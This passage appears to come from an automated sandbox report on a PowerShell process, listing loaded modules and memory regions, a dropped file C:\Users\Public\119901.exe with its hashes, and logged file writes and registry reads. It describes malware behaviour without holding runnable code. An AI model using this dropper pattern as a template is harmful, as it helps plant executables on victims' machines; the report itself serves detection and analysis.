|
|
- |
| private_0x000000001abf0000 | 0x1abf0000 | 0x1b2bffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x000000001b2c0000 | 0x1b2c0000 | 0x1b3c0fff | Private Memory | Readable, Writable |
|
|
|
- |
| kernelbase.dll.mui | 0x1b3d0000 | 0x1b48ffff | Memory Mapped File | Readable, Writable |
|
|
|
- |
| private_0x000000001b540000 | 0x1b540000 | 0x1b5bffff | Private Memory | Readable, Writable |
|
|
|
- |
| system.management.automation.dll | 0x1b5c0000 | 0x1b8a1fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| private_0x000000001b8b0000 | 0x1b8b0000 | 0x1b9affff | Private Memory | Readable, Writable |
|
|
|
- |
| system.transactions.dll | 0x1e230000 | 0x1e278fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| msvcr80.dll | 0x74970000 | 0x74a38fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| kernel32.dll | 0x76cd0000 | 0x76deefff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| user32.dll | 0x76df0000 | 0x76ee9fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| ntdll.dll | 0x76ef0000 | 0x77098fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| psapi.dll | 0x770b0000 | 0x770b6fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| private_0x000000007efe0000 | 0x7efe0000 | 0x7ffdffff | Private Memory | Readable |
|
|
|
- |
| pagefile_0x000000007efe0000 | 0x7efe0000 | 0x7f0dffff | Pagefile Backed Memory | Readable |
|
|
|
- |
| private_0x000000007f0e0000 | 0x7f0e0000 | 0x7ffdffff | Private Memory | Readable |
|
|
|
- |
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | Readable |
|
|
|
- |
| powershell.exe | 0x13f080000 | 0x13f0f6fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| culture.dll | 0x642ff4a0000 | 0x642ff4a9fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| system.directoryservices.ni.dll | 0x7feddba0000 | 0x7feddd34fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| system.management.ni.dll | 0x7feddd40000 | 0x7feddeabfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| system.xml.ni.dll | 0x7feddeb0000 | 0x7fede554fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| microsoft.powershell.security.ni.dll | 0x7fede560000 | 0x7fede59dfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| microsoft.powershell.commands.management.ni.dll | 0x7fede5a0000 | 0x7fede6b7fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| microsoft.powershell.commands.utility.ni.dll | 0x7fede6c0000 | 0x7fede8d5fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| system.transactions.ni.dll | 0x7fede8e0000 | 0x7fede9c4fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| microsoft.wsman.management.ni.dll | 0x7fedea40000 | 0x7fedeae9fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| system.configuration.install.ni.dll | 0x7fedeaf0000 | 0x7fedeb21fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| microsoft.powershell.commands.diagnostics.ni.dll | 0x7fedeb30000 | 0x7fedeb98fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| system.core.ni.dll | 0x7fedeba0000 | 0x7fedeecdfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| system.management.automation.ni.dll | 0x7fedeed0000 | 0x7fedfa2cfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| system.ni.dll | 0x7fedfa30000 | 0x7fee0452fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| mscorlib.ni.dll | 0x7fee0570000 | 0x7fee144bfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| mscorwks.dll | 0x7fee1450000 | 0x7fee1decfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| microsoft.powershell.consolehost.ni.dll | 0x7fee2960000 | 0x7fee2a11fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| mscoreei.dll | 0x7fef1f80000 | 0x7fef2018fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| mscoree.dll | 0x7fef2020000 | 0x7fef208efff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| shfolder.dll | 0x7fef3900000 | 0x7fef3906fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| linkinfo.dll | 0x7fef55d0000 | 0x7fef55dbfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| shdocvw.dll | 0x7fef55e0000 | 0x7fef5613fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| ntshrui.dll | 0x7fef6d70000 | 0x7fef6deffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| cscapi.dll | 0x7fef6df0000 | 0x7fef6dfefff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| apphelp.dll | 0x7fef8020000 | 0x7fef8076fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| slc.dll | 0x7fefab30000 | 0x7fefab3afff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| atl.dll | 0x7fefab60000 | 0x7fefab78fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| ntmarta.dll | 0x7fefaf00000 | 0x7fefaf2cfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| uxtheme.dll | 0x7fefb790000 | 0x7fefb7e5fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| propsys.dll | 0x7fefb7f0000 | 0x7fefb91bfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| comctl32.dll | 0x7fefb970000 | 0x7fefbb63fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| version.dll | 0x7fefc000000 | 0x7fefc00bfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| userenv.dll | 0x7fefc1e0000 | 0x7fefc1fdfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| rsaenh.dll | 0x7fefc430000 | 0x7fefc476fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| cryptsp.dll | 0x7fefc730000 | 0x7fefc746fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| srvcli.dll | 0x7fefcc30000 | 0x7fefcc52fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| cryptbase.dll | 0x7fefcd30000 | 0x7fefcd3efff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| profapi.dll | 0x7fefce40000 | 0x7fefce4efff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| kernelbase.dll | 0x7fefcef0000 | 0x7fefcf5afff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| devobj.dll | 0x7fefcf60000 | 0x7fefcf79fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| cfgmgr32.dll | 0x7fefd0f0000 | 0x7fefd125fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| msvcrt.dll | 0x7fefd210000 | 0x7fefd2aefff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| imm32.dll | 0x7fefd420000 | 0x7fefd44dfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| shell32.dll | 0x7fefd450000 | 0x7fefe1d7fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| ole32.dll | 0x7fefe1e0000 | 0x7fefe3e2fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| wldap32.dll | 0x7fefe400000 | 0x7fefe451fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| msctf.dll | 0x7fefe460000 | 0x7fefe568fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| shlwapi.dll | 0x7fefe590000 | 0x7fefe600fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| gdi32.dll | 0x7fefe740000 | 0x7fefe7a6fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| sechost.dll | 0x7fefe7b0000 | 0x7fefe7cefff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| lpk.dll | 0x7fefe7d0000 | 0x7fefe7ddfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| rpcrt4.dll | 0x7fefe7e0000 | 0x7fefe90cfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| oleaut32.dll | 0x7fefe910000 | 0x7fefe9e6fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| setupapi.dll | 0x7fefeb70000 | 0x7fefed46fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| usp10.dll | 0x7fefed50000 | 0x7fefee18fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| clbcatq.dll | 0x7fefee20000 | 0x7fefeeb8fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| advapi32.dll | 0x7feff120000 | 0x7feff1fafff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| apisetschema.dll | 0x7feff210000 | 0x7feff210fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| private_0x000007ff00010000 | 0x7ff00010000 | 0x7ff0001ffff | Private Memory | - |
|
|
|
- |
| private_0x000007ff00020000 | 0x7ff00020000 | 0x7ff0002ffff | Private Memory | - |
|
|
|
- |
| private_0x000007ff00030000 | 0x7ff00030000 | 0x7ff000cffff | Private Memory | - |
|
|
|
- |
| private_0x000007ff000d0000 | 0x7ff000d0000 | 0x7ff000dffff | Private Memory | - |
|
|
|
- |
| private_0x000007ff000e0000 | 0x7ff000e0000 | 0x7ff0014ffff | Private Memory | - |
|
|
|
- |
| private_0x000007ff00150000 | 0x7ff00150000 | 0x7ff0015ffff | Private Memory | - |
|
|
|
- |
| private_0x000007ff00160000 | 0x7ff00160000 | 0x7ff0016ffff | Private Memory | - |
|
|
|
- |
| private_0x000007fffff10000 | 0x7fffff10000 | 0x7fffff1ffff | Private Memory | Readable, Writable, Executable |
|
|
|
- |
| private_0x000007fffff20000 | 0x7fffff20000 | 0x7fffffaffff | Private Memory | Readable, Writable, Executable |
|
|
|
- |
| pagefile_0x000007fffffb0000 | 0x7fffffb0000 | 0x7fffffd2fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| private_0x000007fffffd3000 | 0x7fffffd3000 | 0x7fffffd4fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x000007fffffd5000 | 0x7fffffd5000 | 0x7fffffd6fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x000007fffffd7000 | 0x7fffffd7000 | 0x7fffffd8fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x000007fffffd9000 | 0x7fffffd9000 | 0x7fffffdafff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x000007fffffdb000 | 0x7fffffdb000 | 0x7fffffdcfff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x000007fffffdd000 | 0x7fffffdd000 | 0x7fffffdefff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x000007fffffdf000 | 0x7fffffdf000 | 0x7fffffdffff | Private Memory | Readable, Writable |
|
|
|
- |
|
For performance reasons, the remaining 73 entries are omitted.
The remaining entries can be found in flog.txt. |
||||||||
Created Files
| Filename | File Size | Hash Values | YARA Match | Actions |
|---|---|---|---|---|
| c:\users\public\119901.exe | 113.50 KB |
MD5:
e1e61c3cc78ea166684120028b97fc02
SHA1: b088f6483da0b4ebc5b7dd66355c97c91bc1e338 SHA256: 053489532b58188bf6ce8476040c70fcff7c69814b4dc98e1801e1d893160d9c |
|
|
Host Behavior
File (125)
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | CONOUT$ | desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE |
|
1 | |
| Create | CONOUT$ | desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE |
|
1 | |
| Create | C:\Windows\System32\WindowsPowerShell\v1.0\GetEvent.types.ps1xml | desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Windows\System32\WindowsPowerShell\v1.0\Diagnostics.Format.ps1xml | desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Windows\System32\WindowsPowerShell\v1.0\WSMan.format.ps1xml | desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Windows\Microsoft.NET\Framework64\v2.0.50727\Config\machine.config | desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\Public\119901.exe | desired_access = GENERIC_WRITE, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Get Info | C:\Windows\assembly\GAC_MSIL\System.Management.Automation\1.0.0.0__31bf3856ad364e35\System.Management.Automation.dll | type = file_attributes |
|
2 | |
| Get Info | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.config | type = file_attributes |
|
1 | |
| Get Info | C:\Windows\System32\WindowsPowerShell\v1.0 | type = file_attributes |
|
1 | |
| Get Info | C:\Windows\System32\WindowsPowerShell\v1.0\GetEvent.types.ps1xml | type = file_attributes |
|
2 | |
| Get Info | C:\Windows\System32\WindowsPowerShell\v1.0\types.ps1xml | type = file_attributes |
|
1 | |
| Get Info | C:\Windows\System32\WindowsPowerShell\v1.0\GetEvent.types.ps1xml | type = file_type |
|
2 | |
| Get Info | C:\Windows\System32\WindowsPowerShell\v1.0\Diagnostics.Format.ps1xml | type = file_type |
|
2 | |
| Get Info | C:\Windows\System32\WindowsPowerShell\v1.0\Diagnostics.Format.ps1xml | type = file_attributes |
|
1 | |
| Get Info | C:\Windows\System32\WindowsPowerShell\v1.0\WSMan.format.ps1xml | type = file_type |
|
2 | |
| Get Info | C:\Windows\System32\WindowsPowerShell\v1.0\WSMan.format.ps1xml | type = file_attributes |
|
1 | |
| Get Info | C:\Windows\System32\WindowsPowerShell\v1.0\Certificate.format.ps1xml | type = file_attributes |
|
1 | |
| Get Info | C:\Windows\System32\WindowsPowerShell\v1.0\FileSystem.format.ps1xml | type = file_attributes |
|
1 | |
| Get Info | C:\Users\aETAdzjz | type = file_attributes |
|
5 | |
| Get Info | C:\ | type = file_attributes |
|
6 | |
| Get Info | C:\Users\aETAdzjz\Desktop | type = file_attributes |
|
7 | |
| Get Info | C:\Users | type = file_attributes |
|
4 | |
| Get Info | C:\Windows\System32\WindowsPowerShell\v1.0\profile.ps1 | type = file_attributes |
|
1 | |
| Get Info | C:\Windows\System32\WindowsPowerShell\v1.0\Microsoft.PowerShell_profile.ps1 | type = file_attributes |
|
1 | |
| Get Info | C:\Users\aETAdzjz\Documents\WindowsPowerShell\profile.ps1 | type = file_attributes |
|
1 | |
| Get Info | C:\Users\aETAdzjz\Documents\WindowsPowerShell\Microsoft.PowerShell_profile.ps1 | type = file_attributes |
|
1 | |
| Get Info | C:\Windows\Microsoft.NET\Framework64\v2.0.50727\config\machine.config | type = file_attributes |
|
1 | |
| Get Info | C:\Windows\Microsoft.NET\Framework64\v2.0.50727\Config\machine.config | type = file_attributes |
|
2 | |
| Get Info | C:\Windows\Microsoft.NET\Framework64\v2.0.50727\Config\machine.config | type = file_type |
|
2 | |
| Get Info | C:\Windows\Microsoft.NET\Framework64\v2.0.50727\Config\machine.config | type = size, size_out = 0 |
|
1 | |
| Get Info | C:\Users\Public\119901.exe | type = file_type |
|
2 | |
| Get Info | C:\Users\Public\119901.exe | type = file_attributes |
|
1 | |
| Open | STD_INPUT_HANDLE | - |
|
1 | |
| Read | C:\Windows\System32\WindowsPowerShell\v1.0\GetEvent.types.ps1xml | size = 4096, size_out = 4096 |
|
3 | |
| Read | C:\Windows\System32\WindowsPowerShell\v1.0\GetEvent.types.ps1xml | size = 4096, size_out = 3315 |
|
1 | |
| Read | C:\Windows\System32\WindowsPowerShell\v1.0\GetEvent.types.ps1xml | size = 781, size_out = 0 |
|
1 | |
| Read | C:\Windows\System32\WindowsPowerShell\v1.0\GetEvent.types.ps1xml | size = 4096, size_out = 0 |
|
1 | |
| Read | C:\Windows\System32\WindowsPowerShell\v1.0\Diagnostics.Format.ps1xml | size = 4096, size_out = 4096 |
|
6 | |
| Read | C:\Windows\System32\WindowsPowerShell\v1.0\Diagnostics.Format.ps1xml | size = 4096, size_out = 2530 |
|
1 | |
| Read | C:\Windows\System32\WindowsPowerShell\v1.0\Diagnostics.Format.ps1xml | size = 542, size_out = 0 |
|
1 | |
| Read | C:\Windows\System32\WindowsPowerShell\v1.0\Diagnostics.Format.ps1xml | size = 4096, size_out = 0 |
|
1 | |
| Read | C:\Windows\System32\WindowsPowerShell\v1.0\WSMan.format.ps1xml | size = 4096, size_out = 4096 |
|
15 | |
| Read | C:\Windows\System32\WindowsPowerShell\v1.0\WSMan.format.ps1xml | size = 4096, size_out = 4018 |
|
1 | |
| Read | C:\Windows\System32\WindowsPowerShell\v1.0\WSMan.format.ps1xml | size = 78, size_out = 0 |
|
1 | |
| Read | C:\Windows\System32\WindowsPowerShell\v1.0\WSMan.format.ps1xml | size = 4096, size_out = 0 |
|
3 | |
| Read | C:\Windows\System32\WindowsPowerShell\v1.0\WSMan.format.ps1xml | size = 4096, size_out = 2762 |
|
1 | |
| Read | C:\Windows\System32\WindowsPowerShell\v1.0\WSMan.format.ps1xml | size = 310, size_out = 0 |
|
1 | |
| Read | C:\Windows\System32\WindowsPowerShell\v1.0\WSMan.format.ps1xml | size = 4096, size_out = 281 |
|
1 | |
| Read | C:\Windows\Microsoft.NET\Framework64\v2.0.50727\Config\machine.config | size = 4096, size_out = 4096 |
|
5 | |
| Write | C:\Users\Public\119901.exe | size = 4096 |
|
11 | |
| Write | C:\Users\Public\119901.exe | size = 7808 |
|
1 | |
| Write | C:\Users\Public\119901.exe | size = 8000 |
|
6 | |
| Write | C:\Users\Public\119901.exe | size = 4182 |
|
1 | |
| Write | C:\Users\Public\119901.exe | size = 5172 |
|
1 | |
| Write | C:\Users\Public\119901.exe | size = 5878 |
|
1 | |
| Write | C:\Users\Public\119901.exe | size = 128 |
|
1 |
Registry (211)
| Operation | Key | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1 | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Environment | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds\Microsoft.PowerShell | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine | - |
|
2 | |
| Open Key | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds\Microsoft.PowerShell | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine | - |
|
6 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine | - |
|
3 | |
| Open Key | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application\PowerShell | - |
|
4 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents\PowerShell | - |
|
4 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer\PowerShell | - |
|
4 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service\PowerShell | - |
|
4 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Media Center | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Media Center\PowerShell | - |
|
4 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\OAlerts | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\OAlerts\PowerShell | - |
|
4 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Security | - |
|
4 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\System | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\System\PowerShell | - |
|
4 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell\PowerShell | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Media Center | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\OAlerts | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\System | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell\PowerShell | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Media Center | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\OAlerts | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\System | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell\PowerShell | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Media Center | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\OAlerts | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\System | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell\PowerShell | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine | - |
|
2 | |
| Open Key | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.NET CLR Networking\Performance | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.net clr networking\Performance | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds | - |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine | value_name = ApplicationBase, data = 0, type = REG_SZ |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine | value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment | value_name = PSMODULEPATH, data = 0, type = REG_EXPAND_SZ |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment | value_name = PSMODULEPATH, data = %SystemRoot%\system32\WindowsPowerShell\v1.0\Modules\, type = REG_EXPAND_SZ |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Environment | value_name = PSMODULEPATH, type = REG_NONE |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds\Microsoft.PowerShell | value_name = path, data = 0, type = REG_SZ |
|
2 | |
| Read Value | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds\Microsoft.PowerShell | value_name = path, data = C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, type = REG_SZ |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine | value_name = ApplicationBase, data = 0, type = REG_SZ |
|
2 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine | value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ |
|
2 | |
| Read Value | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds\Microsoft.PowerShell | value_name = path, data = 0, type = REG_SZ |
|
2 | |
